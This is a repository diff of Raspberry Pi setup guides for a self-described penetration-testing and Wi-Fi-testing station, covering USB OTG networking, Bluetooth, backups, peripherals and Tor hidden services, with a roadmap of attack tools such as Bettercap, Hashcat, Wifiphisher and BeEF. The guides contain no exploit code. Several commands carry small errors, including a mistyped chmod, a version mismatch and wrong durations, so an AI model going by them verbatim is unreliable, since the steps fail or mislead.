PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.

91
OTG.md Normal file
View File

@ -0,0 +1,91 @@
# OTG
OTG (on-the-go) is a neat feature which allows you to connect to your system over ssh by just connection it to usb-c. Therefore you don't need any network cable, bluetooth or wifi connection. It's low power and reduces further risks of detection or hackers.
Update your system first
```bash
sudo apt update
sudo apt install rpi-eeprom
sudo apt full-upgrade
```
Change the `/boot/config.txt` and `/boot/cmdline.txt` files. You can edit them directly with nano: `sudo nano /boot/config.txt` and `sudo nano /boot/cmdline.txt`
`/boot/config.txt`:
```bash[/boot/config.txt]
# enable USB OTG
dtoverlay=dwc2
```
in `/boot/cmdline.txt` add directly after `rootwait`:
```bash[/boot/cmdline.txt]
modules-load=dwc2,g_ether
```
After that we need to add:
- `libcomposite` to `/etc/modules` (`sudo nano /etc/modules`)
- `denyinterfaces usb0` to `/etc/dhcpcd.conf` (`sudo nano /etc/dhcpcd.conf`)
We are ready to configure the network sharing, to do that you need to install and configure dnsmasq:
```bash
sudo apt install dnsmasq
```
And create `/etc/dnsmasq.d/usb` with the following content (`sudo nano /etc/dnsmasq.d/usb`):
```bash[/etc/dnsmasq.d/usb]
interface=usb0
dhcp-range=10.55.0.2,10.55.0.6,255.255.255.248,1h
dhcp-option=3
leasefile-ro
```
Next to that we create `/etc/network/interfaces.d/usb0` with the following content:
```bash[/etc/network/interfaces.d/usb0]
auto usb0
allow-hotplug usb0
iface usb0 inet static
address 10.55.0.1
netmask 255.255.255.248
```
Finally we create `/root/usb.sh`, a simple python script with the following lines of code:
```bash
#!/bin/bash
cd /sys/kernel/config/usb_gadget/
mkdir -p pi4
cd pi4
echo 0x1d6b > idVendor # Linux Foundation
echo 0x0104 > idProduct # Multifunction Composite Gadget
echo 0x0100 > bcdDevice # v1.0.0
echo 0x0200 > bcdUSB # USB2
echo 0xEF > bDeviceClass
echo 0x02 > bDeviceSubClass
echo 0x01 > bDeviceProtocol
mkdir -p strings/0x409
echo "fedcba9876543211" > strings/0x409/serialnumber
echo "Ben Hardill" > strings/0x409/manufacturer
echo "PI4 USB Device" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
# Add functions here
# see gadget configurations below
# End functions
mkdir -p functions/ecm.usb0
HOST="00:dc:c8:f7:75:14" # "HostPC"
SELF="00:dd:dc:eb:6d:a1" # "BadUSB"
echo $HOST > functions/ecm.usb0/host_addr
echo $SELF > functions/ecm.usb0/dev_addr
ln -s functions/ecm.usb0 configs/c.1/
udevadm settle -t 5 || :
ls /sys/class/udc > UDC
ifup usb0
service dnsmasq restart
```
This script need to be run every time the RPi is booted, to do that add `/root/usb.sh` to `/etc/rc.local` before `exit 0` line.
With this setup the RPi will show up as a ethernet device with an IP address of `10.55.0.1` and will assign the device you plug it into an IP address via DHCP. This means you can just ssh to `<username>@10.55.0.1` to start using it.
# Sources and more
[altervista.org](https://raspiproject.altervista.org/en/raspberry-pi-4-as-usb-c-gadget/)

101
README.md Normal file
View File

@ -0,0 +1,101 @@
# Mobile Pen(etration) (Rasp)Berry(Pi)
This is a little project aiming for a multi-purpose mobile Penetration, Pwning and Wifi-Testing Station on a RaspberryPi.
Next to that i gather all snippets and helps related to RaspberryPi and additonal parts.
Warning:
- This project are for **LAWFUL, ETHICAL AND EDUCATIONAL PURPOSES ONLY**.
- Many countries forbid accessing or deauthenticating networks without explicit permission. Make sure you got the permission of network owners or only test your very own networks.
- The files contained in this repository are released "as is" without warranty, support, or guarantee of effectiveness.
- **I am open to hearing about any issues found within these files and will be actively maintaining this repository for the foreseeable future. If you find anything noteworthy, let me know and I'll see what I can do about it.**
The author's intent for this project is to provide information on security and possible attacks. Avoid getting into any of those wiretaps or traps yourself by knowing how they work.
Rules
1. Respect the privacy of others.
2. Think before you type.
3. With great power comes great responsibility.
## Requirements
- Computer with SSH (Linux-type in this repository)
- Raspberry Pi (i will use a RPi4)
- SD card for RPi (8GB and more are prefered, Pwnagotchi wants UHS-I speed and up)
- USB cables (USB-A, USB-C)
- Internet Connection to download packages
Optional:
- Network/LAN Cables
- Wifi antenna/module
- GPS module
- Display
- Power HAT
- Real Time Clock
- additional storage (SD/SSD/HDD adapter)
## Roadmap
You can follow the roadmap step by step or only do what you want. You are free to choose. For a fully built system all articles may be of interest, a more defined small one may only use parts.
Hint: code snippets which are in `<...>` should be replaced by own variables
- [x] [headless setup](headless.md)
- [x] [configure swap](swap.md)
- [x] [configure wifi](wifi.md)
- [x] [increase the safety of your RPi](secure%20raspbian.md)
- [x] [connect via OTG](OTG.md)
- [x] [connect via Bluetooth](bluetooth.md)
- [x] [Add a power hat](power%20hat.md)
- [x] [Add an extra pair of wifi antennas](wifi%20driver.md)
- [x] [Add an GPS module](gps.md)
- [x] [Add a display (oled or eInk)](display.md)
- [x] [Add a real time clock](rtc.md)
- [x] [Add a camera](camera.md)
- NGNIX
- [x] [Create local server](static%20server.md)
- [x] [Secure your local server](secure%20server.md)
- TOR
- [x] [create .onion addresses](onion%20adress.md)
- [x] [Create hidden services with TOR](hidden%20service.md)
- [x] [share files trough TOR](onionshare.md)
- [x] [Wordlists get & create](wordlists.md)
- [x] [create backups online & offline](backup.md)
- Working with tools
- Analyzing
- [ ] Wireshark
- [ ] Ncat-w32
- [ ] netdiscover
- [ ] bluesnarfer
- [ ] btscanner
- [ ] traceroute
- [ ] whois
- Sniffing/Pawning
- [x] [Bettercap](tools/bettercap.md)
- [ ] [Kismet](tools/kismet.md)
- [x] [Pwnagotchi](tools/pwnagotchi.md)
- [ ] Pwncat
- [ ] RouterSploit
- [ ] wifi-honey
- Hashing/Cracking
- [x] [Hashcat](tools/hashcat.md)
- [ ] Sipcrack
- [x] [coWPAtty](tools/cowpatty.md)
- [ ] John the Ripper
- MITM
- [ ] [Wifipisher](tools/wifipisher.md)
- [ ] sslsniff
- [ ] dnscat2
- [ ] websploit
- [ ] [XeroSploit](tools/xerosploit.md)
- other
- [ ] Godoh
- [ ] Macchanger
- [ ] Sniffjoke
- [ ] Legion
- [ ] webshells
- [ ] Firewalld
- [ ] Sqlmap
- [ ] beEF (browser exploitation framework)
# Sources and more helpful informations
[RaspberryPi](https://www.raspberrypi.com/)
[Kali Tools](https://kali.org/tools)

164
backup.md Executable file
View File

@ -0,0 +1,164 @@
# Backups
there are different types of backups. You can create them while the drive is online (mounted) or offline (unmounted).
## offline Backup
`dd` is a disk utility tool that can copy your whole disk bit for bit. But that leads to copying also emtpy space and generating files as big as the volume. Pretty good and simple way to deal with this is simply pipe it via gzip, something like this:
```bash
# sdb is the identificator of your disk/partition
dd if=/dev/sdb | gzip > backup.img.gz
```
This way your image will be compressed and most likely unused space will be squeezed to almost nothing.
You would use this to restore such image back:
```bash
# sdb is the identifier where to play to backup to
cat backup.img.gz | gunzip | dd of=/dev/sdb
```
If you had a lot of files which were recently deleted, image size may be still large (deleting file does not necessarily zeroes underlying sectors).
## save partitions and MBR
Copy all the files from all the partitions preserving meta data
```bash
mkdir myimage/partition1
mkdir myimage/partition2
sudo cp -rf --preserve=all /media/mount_point_partition1/* myimage/partition1/
sudo cp -rf --preserve=all /media/mount_point_partition2/* myimage/partition2/
```
Extract the MBR
```bash
# of is place to write backup to
sudo dd if=/dev/sdX of=myimage/mbr.img bs=446 count=1
```
Partition the destination disk into partitions with sizes greater than copied data and should be of the same format and same flags using gparted.
Mount the freshly formatted and partitioned disk. On most computers, you just need to connect the disk and you can find the mounted partitions in /media folder.
Copy the previously copied data to destination partitions using following commands
```bash
sudo cp -rf --preserve=all myimage/partition1/* /media/mount_point_partition1/
sudo cp -rf --preserve=all myimage/partition2/* /media/mount_point_partition2/
```
Copy back the MBR
```bash
sudo dd if=myimage/mbr.img of=/dev/sdX bs=446 count=1
```
## Borg Backup
Borg backup is a great solution for online backups. Reasons are
- Space efficient storage of backups
- Secure, authenticated encryption
- Compression: LZ4, zlib, LZMA, zstd
- Mountable backups with FUSE
Install borg
```bash
sudo apt install borgbackup
```
You can create the backup on the same disk (absolutly not recommended), on another disk in the same system/computer (not recommended) or an seperate backup-disk/server (recommended).
Before a backup can be made a repository has to be initialized, mount the disk and set your chosen path
```bash
borg init --encryption=repokey <BackupPath>
```
Now you can backup all sort of folders and files to this repository, for example the ~/src and ~/Documents directories and call the archive "Documents":
```bash
borg create <BackupPath>::Documents ~/src ~/Documents
```
All archives and content of specific archives inside the backup can be listed with
```bash
borg list <BackupPath>
borg list <backupPath>::<ArchiveName>
```
To restore an archive and extract all files to the current directory:
```bash
borg extract <BackupPath>::<ArchiveName>
```
You can also delete an archive, for example to free space:
```bash
borg delete <BackupPath>::<ArchiveName>
```
## automate Borg
Borg can be scripted, that allows us to create repeating automatic backups. This is a modified example from the BorgBackup website.
The following example script is meant to be run daily by the root user on different local machines. It backs up a machines important files (but not the complete operating system) to a repository `~/backup/main` on a remote server. Some files which arent necessarily needed in this backup are excluded.
After the backup this script also uses the borg prune subcommand to keep only a certain number of old archives and deletes the others in order to preserve disk space.
Create a file with the current contents `nano backup.sh`
```bash
#!/bin/sh
# Setting this, so the repo does not need to be given on the commandline
export BORG_REPO=ssh://username@example.com:2022/~/backup/main
# paste the passphrase to not be asked everytime the script runs
export BORG_PASSPHRASE='XYZl0ngandsecurepa_55_phrasea&&123'
# helpers and error handling
info() { printf "\n%s %s\n\n" "$( date )" "$*" >&2; }
trap 'echo $( date ) Backup interrupted >&2; exit 2' INT TERM
info "Starting backup"
# Backup the most important directories into an archive named after
# the machine this script is currently running on
borg create \
--verbose \
--filter AME \
--list \
--stats \
--show-rc \
--compression lz4 \
--exclude-caches \
--exclude '/home/*/.cache/*' \
--exclude '/var/tmp/*' \
::'{hostname}-{now}' \
/etc \
/home \
/root \
/var \
backup_exit=$?
info "Pruning repository"
# maintain 7 daily, 4 weekly and 6 monthly archives of THIS machine
# '{hostname}-' prefix limits prune operation to this machine
borg prune \
--list \
--prefix '{hostname}-' \
--show-rc \
--keep-daily 7 \
--keep-weekly 4 \
--keep-monthly 6 \
prune_exit=$?
# use highest exit code as global exit code
global_exit=$(( backup_exit > prune_exit ? backup_exit : prune_exit ))
if [ ${global_exit} -eq 0 ]; then
info "Backup and Prune finished successfully"
elif [ ${global_exit} -eq 1 ]; then
info "Backup and/or Prune finished with warnings"
else
info "Backup and/or Prune finished with errors"
fi
exit ${global_exit}
```
Before running, make sure that the repository is initialized as documented in Remote repositories and that the script has the correct permissions to be executable by the root user, but not executable or readable by anyone else, i.e. root:root 0700. To do that modify the script:
```bash
# make root single owner
sudo chown root:root ./backup.sh
# limit access to owner
sudo chmod 700 ./backup.sh
# make file executable
sudo cmmod +x ./backup.sh
# check permissions
ls -l ./backup.sh
```
Do not forget to test your created backups to make sure everything you need is being backed up and that the prune command is keeping and deleting the correct backups.
# Sources and more
[BorgBackup](https://borgbackup.readthedocs.io)

102
bluetooth.md Normal file
View File

@ -0,0 +1,102 @@
# Bluetooth
Normally bluetooth is pre-installed, if not you can get it with
```bash
sudo apt install bluetooth
```
# Connect devices via bluetooth
```bash
bluetoothctl
> agent on
> scan on
... wait for your device to show up ...
... now pair with its address
> pair aa:bb:cc:dd:ee:ff
... and trust it permantently ...
> trust aa:bb:cc:dd:ee:ff
... wait ...
> quit
```
# Configure bluetooth
If your are missing additional antennas, you want to use wlan0 for monitor mode and injection, meaning we need another way to connect to our RPi. For this, we can setup the bluetooth module to work as a bt-nap server, to be able to connect via bluetooth and reach it with an IP adress on that bluetooth connection. This works both from a laptop and smartphone well.
```bash
# install a few dependencies
sudo apt install git
# download the required repository
git clone https://github.com/bablokb/pi-btnap.git
# install btnap as a server
./pi-btnap/tools/install-btnap server
```
Fix the bluetooth configuration file `/etc/systemd/system/bluetooth.target.wants/bluetooth.service` by disabling the SAP plugin that would break bluetooth, change the ExecStart part with: `ExecStart=/usr/lib/bluetooth/bluetoothd --noplugin=sap`
Lets set the bluetooth name of your device by editing `/etc/bluetooth/main.conf` and finally edit the btnap configuration file itself, `/etc/btnap.conf`:
```bash
MODE="server"
BR_DEV="br0"
BR_IP="192.168.20.99/24"
BR_GW="192.168.20.1"
ADD_IF="lo"
REMOTE_DEV=""
DEBUG=""
```
Enable all the services at boot and restart them:
```bash
systemctl enable bluetooth
systemctl enable btnap
systemctl enable dnsmasq
service bluetooth restart
service dnsmasq restart
service btnap restart
```
Before being able to connect via bluetooth, we need to manually pair and trust the device were going to use (remember to repeat this step for every new device you want to allow to connect to the RPi), make sure your control device (your laptop for instance) has bluetooth enabled and its visible, then from the RPi:
```bash
bluetoothctl
> agent on
> scan on
... wait for your device to show up ...
... now pair with its address
> pair aa:bb:cc:dd:ee:ff
... and trust it permantently ...
> trust aa:bb:cc:dd:ee:ff
... wait ...
> quit
```
Sometimes an error 'no default controller available' shows up, then just run `sudo bluetoothctl` instead.
After reboot, youll be able to connect to the board via bluetooth.
Your system should now have a new DHCP based RPi Network entry in the network manager. Check it with `ifconfig` for a interface named `br0`
To ssh into your RPi via bluetooth from your computer:
```
echo "192.168.20.99 <username>" >> /etc/hosts
ssh root@<hostname>
```
Don't forget to change <username> to your chosen username from above.
# Free your wifi
Were now ready to 'free' the `wlan0` interface and use it for more cool stuff, lets change the file `/etc/network/interfaces` to:
```bash[/etc/network/interfaces]
auto lo
iface lo inet loopback
allow-hotplug wlan0
iface wlan0 inet static
```
From the board now, disable `wpa_supplicant` and reboot:
```bash
service wpa_supplicant disable
sudo systemctl disable wpa_supplicant.service
reboot
```
# Sources and more
[blog.iamlevi.net](https://blog.iamlevi.net/2017/05/control-raspberry-pi-android-bluetooth/)

82
camera.md Normal file
View File

@ -0,0 +1,82 @@
# Camera
Most models of the RPi have a camera port but pay attention as the RPi Zero has a smaller port and needs a smaller ribbon cable.
There are two types of camera modules:
- standard: take pictures in normal light
- NoIR: without infrared filter, you can take pictures in the dark with an infrared light source
## Connect the module
1. look for the camera module port on your RPi
2. pull up the edges of the ports plastic clip
3. insert the camera ribbon cable and make sure the contacts face the ribbon cable connectors
4. push down the plastic clip into place
## Activate your camera
Power up your RPi and start the config tool with `sudo raspi-config`. Scroll down to "enable camera" and set it to "Yes". Now restart your RPi to load all librarys.
## Taking pictures from cli
Raspbian has it's own librarys to interact with the camera. To take pictures you can use the command `raspistill`. Here is a little list of what is possible:
- Take a jpg picture (standard): `raspistill -o image.jpg`
- Take a png picture (or bmp/gif): `raspistill -o image.png -e png`
- Take a picture without preview: `raspistill -o image.jpg -n`
- Wait 3000ms to take the picture: `raspistill -o image.jpg -t 3000`
- set the width and height of the picture: `raspistill -o image.jpg -w 640 -h 480`
- set the quality of the picture (from 0 to 100%): `raspistill -o image.jpg -q 20`
- take a series of pictures all 5 seconds for a whole hour (3600000 seconds): `raspistill -o image_%04d.jpg -tl 5000 -t 3600000` (later you can stick it together with ffmpeg to get a movie)
## Taking videos from cli
Next to pictures you can take videos
- take a video for 5 seconds: `raspivid -o video.h264 -t 50000` (to never end set t to 0)
- set width and height: `raspivid -o video.h264 -t 50000 -w 1280 -h 720`
- set the bitrate: `raspivid -o video.h264 -t 50000 -b 3500000`
- set the framerate: `raspivid -o video.h264 -t 50000 -f 10`
- send the video stream to sdtout: `raspivid -t 50000 -o - `
To convert videos from H264 to mp4 you can use gpac:
```bash
sudo apt-get install gpac
MP4Box -fps 30 -add video.h264 video.mp4
```
## Control the camera with python
You can control your camera using python libraries (preinstalled on Raspbian).
Open an editor and paste the following, save it like `camera.py`.
```python
from picamera import PiCamera
from time import sleep
camera = PiCamera()
camera.start_preview()
sleep(5)
camera.stop_preview()
```
The camera should be shown 5 seconds and then close.
There are several functions/filters you can use:
- Rotate (in degree): `camera.rotation = 180`
- Make the camera preview see-through by setting an alpha level: `camera.start_preview(alpha=200)`
- Take a picture (its important to sleep for at least two seconds before capturing an image because this gives the cameras sensor time to sense the light levels)
```python
camera.start_preview()
sleep(5)
camera.capture('/home/pi/Desktop/image.jpg')
camera.stop_preview()
```
- record a video:
```python
camera.start_recording('/home/pi/Desktop/video.h264')
sleep(5)
camera.stop_recording()
```
- change the resolution: `camera.resolution = (2592, 1944)`
- maximum resolution is 2592x1944 for still photos,
- maximum resolution is 1920x1080 for video recording,
- minimum resolution is 64x64
- change the framerate: `camera.framerate = 15`
- 0 is minimum
- 15 is maximum
- add text to your image: `camera.annotate_text = "Hello world!"`
# Source and more
[RaspberryPi.com](https://www.raspberrypi.com/documentation/accessories/camera.html)

134
display.md Executable file
View File

@ -0,0 +1,134 @@
# Display
Displays are great to get visual output from your system without the need to login.
Here are different displays you can use.
## SSD1306 I2C OLED Display
![https://riton-duino.blogspot.com/2019/11/afficheur-oled-ssd1306-comparons.html](Assets/ssd1306.jpg)
### Wire it up
Connect your display to the referencing ports of your RPi
| Display | RPi |
| ---| ---|
| UCC/VCC/VDD/+ | 3,3V
G/GND/-| Ground, Mass
C/CL/SDC/SCK | Clock if I2C
D/DA/SDA | Data of I2C
### enable I2C
power up your RPi and start the config tool `sudo raspi-config`. Go to _Interfacing Options_>_I2C_ and activtate it with _Yes_. Exit the menu and restart your RPi.
If everything worked correct you can find the OLED Display Modules Address
```bash
i2cdetect -y 1
```
If your RPi doesn't know i2cdetect install it with `sudo apt-get install -y i2c-tools`
### Python library
Install OLED Python Library
```bash
# python requirements
apt install -y python3-dev python3-pil python3-smbus python3-pil python3-pip python3-setuptools python3-rpi.gpio python3-pip
# clone the repository
git clone https://github.com/adafruit/Adafruit_Python_SSD1306.git
# navigate to the librarys directory
cd Adafruit_Python_SSD1306
# install the library for Python3
sudo python3 setup.py install
# run some examples
cd examples
python3 stats.py
```
### other libraries
https://github.com/adafruit/Adafruit_SSD1306.git
https://github.com/greiman/SSD1306Ascii.git
### Screen Size Adjustment
The Adafruit examples assume you have a 128×32 screen. They still run with a 128×64 pixel screen but it is better to change them before you move onto anything more complicated. To do this simply edit the scripts and disable the 128x32 config line by placing a `#` character at the front, and enable the 128x64 line by deleting the `#` character from the front.
## Waveshare 2.13" E-ink HAT
![](Assets/waveshare-2.13.jpg)
[Link to Waveshare](https://www.waveshare.com/2.13inch-e-paper-hat.htm)
This HAT provides 250x120 pixels e-ink with embedded controller and SPI communication. You can easily just plug it into your RPis 40 Header. If you got passive coolers or something else in the way you can also un-solder the SPI header. All while still needing a very small potion of power (Standby $<0.017mW$).
### enable SPI
The communication interface is SPI, so to use it enable it on your RPi with `sudo raspi-config`, choose _Interfacing Options_->_SPI_->_Yes_. Restart the RPi after that `sudo reboot`
### install libraries
Open terminal of Raspberry Pi and run the following commands to install corresponding libraries. Install the libraries you need, not all of them are necessary.
Install BCM2835 libraries
```bash
wget http://www.airspayce.com/mikem/bcm2835/bcm2835-1.71.tar.gz
tar zxvf bcm2835-1.71.tar.gz
cd bcm2835-1.60/
sudo ./configure
sudo make
sudo make check
sudo make install
```
Install WiringPi libraries
```bash
sudo apt install wiringpi
wget https://project-downloads.drogon.net/wiringpi-latest.deb
sudo dpkg -i wiringpi-latest.deb
gpio -v
```
Install Python2 libraries
```bash
sudo apt update
sudo apt install python-pip python-pil python-numpy
sudo pip install RPi.GPIO spidev
```
Install Python3 libraries
```bash
sudo apt update
sudo apt install python3-pip python3-pil python3-numpy
sudo pip3 install RPi.GPIO spidev
```
### Demo Code & Examples
Clone demo codes from waveshare:
```bash
git clone https://github.com/waveshare/e-Paper
```
There are different examples for C and Python.
For C examples:
```bash
# enter folder of c samples
cd ~/e-Paper/RaspberryPi\&JetsonNano/
cd c
# modify the main.c and uncomment your display
sudo nano examples/main.c
# compile code
sudo make clean
sudo make
# run the example
sudo ./epd
```
For Python example:
```bash
# enter folder of python samples
cd ~/e-Paper/RaspberryPi\&JetsonNano/
cd python/examples
# list all files for different displays
ls -al
# run a chosen example
sudo python epd_xxx_test.py
sudo python3 epd_xxx_test.py
```
# Sources and more
[SSD1306 datasheet](https://cdn-shop.adafruit.com/datasheets/SSD1306.pdf)
[Waveshare Wiki](https://www.waveshare.com/wiki/2.13inch_e-Paper_HAT)

82
gps.md Normal file
View File

@ -0,0 +1,82 @@
# GPS: Glonass G-7020 VK-172 GPS
I got myself the G-7020 GPS Module to connect my RPi via USB. Here is how it works
```bash
# requirements
sudo apt install gpsd gpsd-clients python-gi-cairo minicom
```
Check if gpsd is already running
```bash
ps -aux | grep gpsd
kill <gpsd id>
```
Note if you're using the Raspbian Jessie or later release you'll need to disable a systemd service that gpsd installs. This service has systemd listen on a local socket and run gpsd when clients connect to it, however it will also interfere with other gpsd instances that are manually run (like here). You will need to disable the gpsd systemd service by running the following commands:
```bash
sudo systemctl stop gpsd.socket
sudo systemctl disable gpsd.socket
```
Should you ever want to enable the default gpsd systemd service you can run these commands to restore it (but remember the rest of the steps here won't work!):
```bash
sudo systemctl enable gpsd.socket
sudo systemctl start gpsd.socket
```
Check if port 2947 is free or blocked:
```bash
netstat -tulpn
```
Now list all ports and find the new one
```bash
ls /dev/tty*
```
or use system to show new devices
```bash
dmesg | grep tty
```
Test if the choosen port gets data
```bash
cat /dev/ttyACM0
```
If you wish to go that route, for whatever reason, before doing anything else, make sure gpsd is not running.
```bash
sudo killall gpsd
```
and remove any sockets gpsd might have left behind,
```bash
sudo rm /var/run/gpsd.sock
```
Change from binary to NMEA:
```bash
gpsctl -f -n /dev/ttyUSB0
stty -F /dev/ttyACM0
#set baud rate of GPS
stty -F /dev/ttyACM0 9600
```
Now test your device
```bash
minicom -b 9600 -o -D /dev/ttyACM0
```
To leave minicom press 'Ctrl-A' then 'X' and ENTER
and test gpsd
```bash
gpsd -b -n -N -D4 -s 9600 -S 2948 /dev/ttyACM0
```
You can configure your GPS device by editing `/etc/default/gpsd`:
```bash
START_DAEMON="true"
USBAUTO="true"
DEVICES="/dev/ttyACM0"
GPSD_OPTIONS="-b -n -S 2900"
GPSD_SOCKET="/var/run/gpsd.sock"
```
After that restart the service and watch the results
```bash
sudo service gpsd restart
xgps
cgps -s
```

34
headless.md Normal file
View File

@ -0,0 +1,34 @@
Headless setup is a often used configuration as you don't need any extra pair of keyboard and mouse.
# Setting up your Computer and SD Card
We will start at your Computer. Insert the SD card into your computer.
## Writing the Image to SD card
Update your Distribution and install the RPi imager.
```bash
sudo apt update
sudo apt upgrade
sudo apt install rpi-imager #tool to download and install images onto SD card
rpi-imager
```
In this Series we use the RaspberryPi OS (legacy) without desktop environment.
Now we can configure the Image to start at best conditions.
## Enable SSH
To enable SSH directly on the SD card add a new file named `ssh`, with no extension, to the
If you have added an empty file `ssh` to the boot sector of your SD card (`touch /boot/ssh`), the Pi will start with SSH enabled. After that we can connect from your laptop with: `ssh pi@raspberrypi.local` (or `ssh pi@<IPADRESS>` when the ip adress in known).
# Booting up your Pi
Insert the SD card into your RapsberryPi, connect it to your router and power it on. After the startup we can connect via SSH
`ssh pi@raspberrypi.local` and log in (default pw is "raspberry").
Normally your raspberry can be found in the same network with `raspberrypi.local`. If not check your routers ip table to find your RPis IP and connect `@<localip>`
If you don't have a wire-connection you can use your Wifi, read the [how to](wifi.md)
Start using the RPi with `raspi-config` to configure all settings.
# Sources and more
[RaspbberryPi.com](https://www.raspberrypi.com/software/)

40
hidden service.md Normal file
View File

@ -0,0 +1,40 @@
# run a hidden service.
Get yourself tor and a webserver like NGNIX
`sudo apt install nginx tor -y`
Enable and start the nginx service. Check if it runs correct
```bash
sudo systemctl enable nginx
sudo systemctl start nginx
sudo systemctl status nginx
```
It should promt "active". Do the same with tor
```bash
sudo systemctl enable tor
sudo systemctl start tor
sudo systemctl status tor
```
Create a html file at `/var/www/html`. More details are in [Static Server](static%20server.md).
Restart NGNIX `sudo systemctl restart nginx`
# link website to tor
The `torrc` file describes the behavior of tor and has everything in it to run a hidden service.
Open it with a text editor: `sudo nano /etc/tor/torrc` and uncomment the following lines
```bash
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:80
```
Restart tor `sudo systemctl restart tor`
Now tor will host your webpage. To get your current onion address call
```bash
sudo cat /var/lib/tor/hidden_service/hostname
```
With the given url you can access your page from tor browser.
Read [onion addresses](onion%20adress.md) to create your own address.
# Sources and more
torproject.org

51
onion adress.md Normal file
View File

@ -0,0 +1,51 @@
# Create your very own .onion addresses
## prepare
Make sure your computer is updated:
```bash
sudo apt update -y && sudo apt upgrade -y
```
Now get all required packages
```bash
sudo apt install gcc libsodium-dev make autoconf git -y
```
## mkp224o
Now we will use a practical tool made by [cathugger](github.com/cathugger).
Download it and get into the new folder:
```bash
git clone https://github.com/cathugger/mkp224o
cd mkp224o
```
Now let's configure and compile your program
```bash
./autogen.sh
./configure
make
```
To configure the programm for your need you can list all possibilities with `./configure --help`. For example you could run `./configure --enable-amd64-51-30k` (if you got the required hardware).
Right after that you can create your own address:
```bash
./mkp224o <filter1> <filter2>
```
You can choose your own filter options as those filters are the first characters of your address. All created links are saved in a subdirectory "<filter1>/<filter2>.onion"
To copy the address into your TOR folder you can simply copy it
```bash
sudo cp -r filter1 /var/lib/tor/hidden_service
```
## Length of Addresses
New .onion addresses at v3 version require a length of 56 characters and end with '.onion'. To create an address the program generates keys until a fitting one, with your filter option, is found. The longer the wanted filter length is, the longer the program has to work.
As a example this table was created on a computer with 16 kernels at 4Ghz each:
| filter length | 1 Thread | 2 Thread | 4 Thread | 8 Thread | 16 Thread |
| ------------- | -------- | --------- | --------- | -------- | --------- |
| 1 | 0,101s | 0,102s | 0,102s | 0,102s | 0,102s |
| 2 | 0,102s | 0,102s | 0,102s | 0,102s | 0,005s |
| 3 | 0,101s | 0,101s | 0,101s | 0,103s | 0,103s |
| 4 | 0,302s | 0,102s | 0,102s | 0,102s | 0,108s |
| 5 | 25,622s | 3,404s | 2,203s | 7,907s | 2,804s |
| 6 | >2min | 1m12,853s | 4m18,385s | 53,527s | 52,261s |
| 7 | 16h | 8h | 4h | 1h | 1h |

44
onionshare.md Normal file
View File

@ -0,0 +1,44 @@
# OnionShare
OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network.
Add repository and install packages
```bash
sudo add-apt-repository ppa:micahflee/ppa
sudo apt update
sudo apt install -y onionshare tor python3 python3-pip
# install the cli
pip3 install --user onionshare-cli
# add path to shell
echo "PATH=\$PATH:~/.local/bin" >> ~/.bashrc
source ~/.bashrc
# run it
onionshare-cli --help
```
There are different options like running a chat server
```bash
onionshare-cli --chat
```
Load the shown OnionShare address in Tor Browser to make sure it works
## persistent anonymous dropbox
Let people anonymously upload files to your RPi, make the adress persistent and make it public (without password protection). With this setup everybody can share files with the RPi.
```bash
onionshare-cli --receive --persistent ~/anon-dropbox.session --public
```
Be aware that users now can upload malicious content to your RPi so make sure the directory is not executable.
## multiplex your screen
